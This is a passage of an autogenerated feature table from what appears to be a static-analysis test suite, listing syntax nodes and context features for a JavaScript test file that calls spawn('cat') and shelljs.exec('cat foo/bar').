anonymous function | enclosingFunctionBody | e s | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | 'arguments' object of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | exceptional return of anonymous function | enclosingFunctionBody | e s | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | exceptional return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | function (e, s) {} | CalleeFlexibleAccessPath | exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | function (e, s) {} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | function (e, s) {} | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | function (e, s) {} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | function (e, s) {} | contextSurroundingFunctionParameters | (e, s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | function (e, s) {} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | return of anonymous function | enclosingFunctionBody | e s | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | return of anonymous function | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:18:140:35 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:28:140:28 | e | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:28:140:28 | e | contextSurroundingFunctionParameters | (e, s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:28:140:28 | e | enclosingFunctionBody | e s | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:28:140:28 | e | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:28:140:28 | e | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:31:140:31 | s | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:31:140:31 | s | contextSurroundingFunctionParameters | (e, s) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:31:140:31 | s | enclosingFunctionBody | e s | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:31:140:31 | s | enclosingFunctionName | exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:140:31:140:31 | s | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:5 | spawn | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:5 | spawn | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:5 | spawn | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:12 | exceptional return of spawn("cat") | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:12 | exceptional return of spawn("cat") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:12 | exceptional return of spawn("cat") | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:12 | spawn("cat") | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:12 | spawn("cat") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:1:142:12 | spawn("cat") | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:7:142:11 | "cat" | CalleeFlexibleAccessPath | spawn | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:7:142:11 | "cat" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:7:142:11 | "cat" | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:7:142:11 | "cat" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:7:142:11 | "cat" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:142:7:142:11 | "cat" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:5:145:11 | shelljs | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:5:145:11 | shelljs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:5:145:11 | shelljs | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:5:145:32 | shelljs | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:5:145:32 | shelljs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:5:145:32 | shelljs | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:5:145:32 | shelljs ... elljs") | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:5:145:32 | shelljs ... elljs") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:5:145:32 | shelljs ... elljs") | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:21 | require | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:21 | require | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:21 | require | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:32 | exceptional return of require("shelljs") | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:32 | exceptional return of require("shelljs") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:32 | exceptional return of require("shelljs") | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:32 | require("shelljs") | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:32 | require("shelljs") | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:15:145:32 | require("shelljs") | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:23:145:31 | "shelljs" | CalleeFlexibleAccessPath | require | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:23:145:31 | "shelljs" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:23:145:31 | "shelljs" | calleeImports | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:23:145:31 | "shelljs" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:23:145:31 | "shelljs" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:145:23:145:31 | "shelljs" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:7 | shelljs | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:7 | shelljs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:7 | shelljs | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:12 | shelljs.exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:12 | shelljs.exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:12 | shelljs.exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:61 | exceptional return of shelljs ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:61 | exceptional return of shelljs ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:61 | exceptional return of shelljs ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:61 | shelljs ... (out)}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:61 | shelljs ... (out)}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:1:146:61 | shelljs ... (out)}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:9:146:12 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:9:146:12 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:9:146:12 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:14:146:26 | "cat foo/bar" | CalleeFlexibleAccessPath | shelljs.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:14:146:26 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:14:146:26 | "cat foo/bar" | calleeImports | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:14:146:26 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:14:146:26 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:14:146:26 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:14:146:26 | "cat foo/bar" | receiverName | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | 'arguments' object of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | 'arguments' object of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | 'arguments' object of anonymous function | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | 'arguments' object of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | (err, o ... g(out)} | CalleeFlexibleAccessPath | shelljs.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | (err, o ... g(out)} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | (err, o ... g(out)} | calleeImports | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | (err, o ... g(out)} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | (err, o ... g(out)} | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | (err, o ... g(out)} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | (err, o ... g(out)} | receiverName | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | exceptional return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | exceptional return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | exceptional return of anonymous function | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | exceptional return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | return of anonymous function | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | return of anonymous function | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | return of anonymous function | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:29:146:60 | return of anonymous function | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:30:146:32 | err | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:30:146:32 | err | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:30:146:32 | err | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:30:146:32 | err | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:30:146:32 | err | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:35:146:37 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:50 | console | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:50 | console | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:50 | console | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:50 | console | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:50 | console | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:54 | console.log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:54 | console.log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:54 | console.log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:54 | console.log | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:54 | console.log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | console.log(out) | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | console.log(out) | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | exceptional return of console.log(out) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | exceptional return of console.log(out) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | exceptional return of console.log(out) | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | exceptional return of console.log(out) | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:44:146:59 | exceptional return of console.log(out) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:52:146:54 | log | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:52:146:54 | log | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:52:146:54 | log | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:52:146:54 | log | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:52:146:54 | log | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:56:146:58 | out | CalleeFlexibleAccessPath | console.log | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:56:146:58 | out | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:56:146:58 | out | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:56:146:58 | out | contextSurroundingFunctionParameters | (err, out) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:56:146:58 | out | enclosingFunctionBody | err out console log out | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:56:146:58 | out | enclosingFunctionName | shelljs.exec#functionalargument | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:56:146:58 | out | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:146:56:146:58 | out | receiverName | console | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:7 | shelljs | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:7 | shelljs | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:7 | shelljs | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:12 | shelljs.exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:12 | shelljs.exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:12 | shelljs.exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:47 | exceptional return of shelljs ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:47 | exceptional return of shelljs ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:47 | exceptional return of shelljs ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:1:147:47 | shelljs ... utf8'}) | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:9:147:12 | exec | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:9:147:12 | exec | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:9:147:12 | exec | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:14:147:26 | "cat foo/bar" | CalleeFlexibleAccessPath | shelljs.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:14:147:26 | "cat foo/bar" | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:14:147:26 | "cat foo/bar" | calleeImports | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:14:147:26 | "cat foo/bar" | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:14:147:26 | "cat foo/bar" | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:14:147:26 | "cat foo/bar" | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:14:147:26 | "cat foo/bar" | receiverName | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | CalleeFlexibleAccessPath | shelljs.exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | InputArgumentIndex | 1 | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | calleeImports | shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | contextFunctionInterfaces | cat(file) | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | fileImports | child_process cross-spawn exec express fs shelljs | +| autogenerated/ShellCommandInjectionFromEnvironment/UselessUseOfCat/uselesscat.js:147:29:147:46 | {encoding: 'utf8'} | receiverName | shelljs | +| 